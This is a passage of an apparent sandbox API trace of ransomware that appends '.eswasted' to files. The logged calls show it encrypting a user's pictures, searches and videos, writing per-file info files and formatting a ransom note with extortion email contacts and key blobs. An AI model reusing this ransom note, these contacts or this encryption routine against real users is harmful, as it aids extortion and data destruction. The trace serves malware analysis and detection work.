dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0081.549] WriteFile (in: hFile=0x110, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0081.549] SetEndOfFile (hFile=0x110) returned 1 [0081.552] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.552] CloseHandle (hObject=0x110) returned 1 [0081.553] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0081.553] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f02c8 | out: hHeap=0x4a0000) returned 1 [0081.553] _aulldvrm () returned 0x0 [0081.553] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0081.554] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0081.554] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.554] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\WR4O2FvxQyjiSwc.png") returned 100 [0081.554] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2d2) returned 0x4f0020 [0081.554] lstrcpyW (in: lpString1=0x4f00e8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.554] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0081.554] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0081.555] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0081.555] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.556] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\WR4O2FvxQyjiSwc.png.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\wr4o2fvxqyjiswc.png.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0081.560] WriteFile (in: hFile=0x110, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0081.561] SetEndOfFile (hFile=0x110) returned 1 [0081.561] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.561] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.561] lstrcpyW (in: lpString1=0x4f00e8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.561] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\WR4O2FvxQyjiSwc.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\wr4o2fvxqyjiswc.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\WR4O2FvxQyjiSwc.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\wr4o2fvxqyjiswc.png.eswasted")) returned 1 [0081.563] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\WR4O2FvxQyjiSwc.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\wr4o2fvxqyjiswc.png.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0081.563] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0081.563] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x17319 [0081.563] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17319) returned 0xb10000 [0081.563] CloseHandle (hObject=0x118) returned 1 [0081.569] UnmapViewOfFile (lpBaseAddress=0xb10000) returned 1 [0081.569] CloseHandle (hObject=0x100) returned 1 [0081.570] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ef440 [0081.570] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0081.571] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ef488 | out: pbBuffer=0x4ef488) returned 1 [0081.571] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.571] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0081.572] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0081.572] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.582] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4d91a8 [0081.582] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef440 | out: hHeap=0x4a0000) returned 1 [0081.582] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0081.582] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Ueudq/A01sPx1sYPRRmybprKbZAwQcvQ8fIthYUSqIaS0Jno3MrRUe5eOtLHhvkX\r\nGWgzs4h+Ti4XjBKnwIKIfAgDQj3aWcvLpUppV6o1FXvZvFvny71hQWMPAsJ8yMko\r\nzxel40pp6vvK5QbdFGtMpJisDiBXaXfAMQGSTTqWK7PjqHcOjLandwt6F2bM9Vj5\r\nPyDNrCCvZdIFVAAuuTvCXh312rhscHsT+ziYVqc71gDQ4YKGe7Lrfe7NIrYgl8W4\r\nV0wEeiRreksPKXGvPGbqA7H4LSuQCBBvX1blH+0HdoCCzTa6LthhICLRlRrnvhgX\r\nXwRGdHbHIWOyYaOsbfwOQLbPti1iSFNgA+Zojqb8AbHrgWN9VIzKw4FOqzlrgq+n\r\n5XVyiWs1OUMglfU0g9alCxBnY+MV8d5xFdPY2qF/f4DeJiFXsgQQdsQuJSVoTl0T\r\nJsOwcwLFVrsb4s6aoa7sHgPe8SkyOtnH6wR5KR6HmVuqDWO9pMHWjkVK2wyTLcsG\r\ntv+RYTuULD0tU6gPKlGb1KPnFizGImROoyF8TA6jxhepnJvSYy3rc3GFuCqZdw5I\r\nR9KmUXiUNkQqwIagTgySUlU7oaT40MfGDkKqUY6DgWZq48+yLIZvMLZrf+9ZeZye\r\njRkOIFUeVg+N5O2akELjkPs1yf6hByE8gjyYoMVm0lp=[end_key]\r\nKEEP IT\r\n") returned 990 [0081.582] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0081.582] WriteFile (in: hFile=0x110, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0081.582] SetEndOfFile (hFile=0x110) returned 1 [0081.628] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.628] CloseHandle (hObject=0x110) returned 1 [0081.630] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0020 | out: hHeap=0x4a0000) returned 1 [0081.630] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x50b200 | out: hHeap=0x4a0000) returned 1 [0081.630] _aulldvrm () returned 0x0 [0081.630] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0081.631] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0081.631] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.631] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms") returned 70 [0081.631] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x296) returned 0x4ef440 [0081.632] lstrcpyW (in: lpString1=0x4ef4cc, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.632] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0081.632] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0081.633] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0081.633] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.633] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0081.633] WriteFile (in: hFile=0x110, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0081.635] SetEndOfFile (hFile=0x110) returned 1 [0081.635] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.635] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.635] lstrcpyW (in: lpString1=0x4ef4cc, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.635] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms.eswasted")) returned 1 [0081.636] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0081.636] GetLastError () returned 0x5 [0081.636] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms.eswasted")) returned 0x23 [0081.637] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.eswasted", dwFileAttributes=0x22) returned 1 [0081.637] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0081.637] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0081.637] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0xf8 [0081.637] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf8) returned 0xb10000 [0081.637] CloseHandle (hObject=0xf8) returned 1 [0081.640] UnmapViewOfFile (lpBaseAddress=0xb10000) returned 1 [0081.640] CloseHandle (hObject=0x120) returned 1 [0081.640] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.eswasted", dwFileAttributes=0x23) returned 1 [0081.640] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ef6e0 [0081.640] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0081.641] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ef728 | out: pbBuffer=0x4ef728) returned 1 [0081.641] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.641] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0081.642] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0081.642] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.653] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ddfd8 [0081.653] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef6e0 | out: hHeap=0x4a0000) returned 1 [0081.653] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0081.653] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]JLc3pY9M29+aEgny1rgXbBDXc4Xl7NbpNicOnOryqCjycLJyWyxbuVIsDQe2cHs4\r\n9sfsbyAKZQIhRQlJN72lsKwRtG13Qzx4QPUvQCFzn6Lfmcone8gwkHJHBIk5S7hP\r\nN/WBV0INdcbUkdTuT3V9eKIAZ0vG4bcie0ldu+e7HrIYh/wnfEkJ7z6a73ouIBVV\r\nmg7/U7zVDup6vnj8FoJowNBEY2qEH25D5JXmwpyhE5SRnX7bwSCBRoefzBbiPd1y\r\nY13ZObKpQDPBENLACkJbMLR+h2PKW28uHvgERo+vG/gBhmm/2GS41oVZOL/JdGdf\r\nllMdYi97H8A24ARUNzD+ay9ttY9M9fyQ2kfo//sBXjCrczJ/xPpI2Xn3euqu5myA\r\n7xgHx+k6i4D/LXhbQjcdjz7k3aeenmU5W74ClAZl1+EKOSo6zRG/Tb0oCRSuCBc+\r\nrjKhKiMMqtt1tG3y+nRcKLTAe6HV8BqKIKYK/9u6+4hD48pJ7v8r/x8GvH8hYMO6\r\nYvu1vGLvWs7TzbTCc/e7rmFuL9bFNDJgomkIF0z7gkNyDj9N+H4YP53kpFP7tmBx\r\nu3v0ZCX322mQYgir6pLNt25OaNtsmu4E+jTXQM6dD4tgddySS3dpSmBCO4qglh0e\r\njeuncb5Bw7nIZecCIq6Vc16q3pDm0Z4+3YFIG31aaWR=[end_key]\r\nKEEP IT\r\n") returned 990 [0081.653] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0081.653] WriteFile (in: hFile=0x110, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0081.653] SetEndOfFile (hFile=0x110) returned 1 [0081.656] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.656] CloseHandle (hObject=0x110) returned 1 [0081.658] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef440 | out: hHeap=0x4a0000) returned 1 [0081.658] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x5004b8 | out: hHeap=0x4a0000) returned 1 [0081.658] _aulldvrm () returned 0x0 [0081.658] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0081.660] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0081.660] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.660] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5twB-3ZSOZ5hB5u6fN.avi") returned 63 [0081.660] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x288) returned 0x4ef440 [0081.660] lstrcpyW (in: lpString1=0x4ef4be, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.660] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0081.660] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0081.661] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0081.661] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.661] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5twB-3ZSOZ5hB5u6fN.avi.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\5twb-3zsoz5hb5u6fn.avi.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0081.662] WriteFile (in: hFile=0x110, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0081.696] SetEndOfFile (hFile=0x110) returned 1 [0081.696] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.696] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.696] lstrcpyW (in: lpString1=0x4ef4be, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.696] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5twB-3ZSOZ5hB5u6fN.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\5twb-3zsoz5hb5u6fn.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5twB-3ZSOZ5hB5u6fN.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\5twb-3zsoz5hb5u6fn.avi.eswasted")) returned 1 [0081.697] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5twB-3ZSOZ5hB5u6fN.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\5twb-3zsoz5hb5u6fn.avi.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0081.697] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0081.697] GetFileSize (in: hFile=0x120, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x12e47 [0081.697] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12e47) returned 0xb10000 [0081.698] CloseHandle (hObject=0x120) returned 1 [0081.701] UnmapViewOfFile (lpBaseAddress=0xb10000) returned 1 [0081.702] CloseHandle (hObject=0xf8) returned 1 [0081.702] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4d91a8 [0081.702] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0081.703] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0081.703] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.703] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0081.703] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0081.703] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.712] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ddfd8 [0081.712] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0081.712] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0081.712] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]KsgzLqQT/oaAkj72LjrzYsY7MYPBPga9g5zzHvX6cwGsxpXUW+JjX1ho+q86BOIf\r\nk0MlHNDeF6kgP0HXjsNeaJBg0rrJSQJLweYizu1kurt41r8OLMTW9D14qHuB8iNt\r\nA9Bth8Z7PVuRhTH7ztz7YjaD24EAuB1j8JKZBY8uqPGwE7A+88nBiVQLjHYIQrdd\r\nu0PiXtmivhihkRCecxeUSpplLT5MI3JrhPFI6VIIeM8hbDY1B6j5fujnixP1d1PB\r\niiI/lsQw4+s+USDaE5eM7iZvgbUQJP6khV4uBPyoi/KMk3XRVKTlCNViLaP77JKA\r\nDX5DVOXWvOMcR91vebUZLj0yEaoRERYJMg3f+v52vFtdJTJ/OU5zUo2WcYvuMDwz\r\n20Ac78TrRiKNUdtFrmEnkKRi4TbORu02LW+IoSZevKz2mHdJBTJGK1hDU7O4jvEi\r\nZ3wcYgISdNhKItBRlWPXTCOGPXwkoLv5nvwq64A72q7PjFUjQ0WKH7L6mgvEZ6C+\r\nb07PbkBnnKLPVdkgN90jpEiMt8yFIuwqmaaqB/Q91M0jRdWP8Ayckm4Byx2K2k5W\r\nD1kQO37he25ms1ytLpn2Byz0qqzmRUCtxUEncelVDRhddRH+zi82C6GZtP/jNZON\r\n9+RG9TA49ncYPkXmQ8PUBRG1OcAgaDz7bVKfEyCfQQS=[end_key]\r\nKEEP IT\r\n") returned 990 [0081.712] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0081.712] WriteFile (in: hFile=0x110, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0081.712] SetEndOfFile (hFile=0x110) returned 1 